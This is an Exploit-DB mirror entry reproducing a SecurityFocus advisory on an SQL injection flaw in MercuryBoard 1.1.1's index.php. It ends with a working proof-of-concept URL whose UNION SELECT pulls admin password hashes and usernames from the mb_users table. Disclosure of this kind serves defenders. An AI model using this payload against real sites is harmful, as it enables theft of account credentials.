exploit-db-mirror/platforms/php/webapps/25093.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

11 lines
No EOL
565 B
Text
Executable file

source: http://www.securityfocus.com/bid/12503/info
MercuryBoard is affected by an SQL injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input before being used in SQL queries.
The vulnerability is reported to affect the 'index.php' script.
MercuryBoard 1.1.1 and prior versions are affected by this vulnerability.
http://www.example.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION
%20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20
=%201%20limit%201/*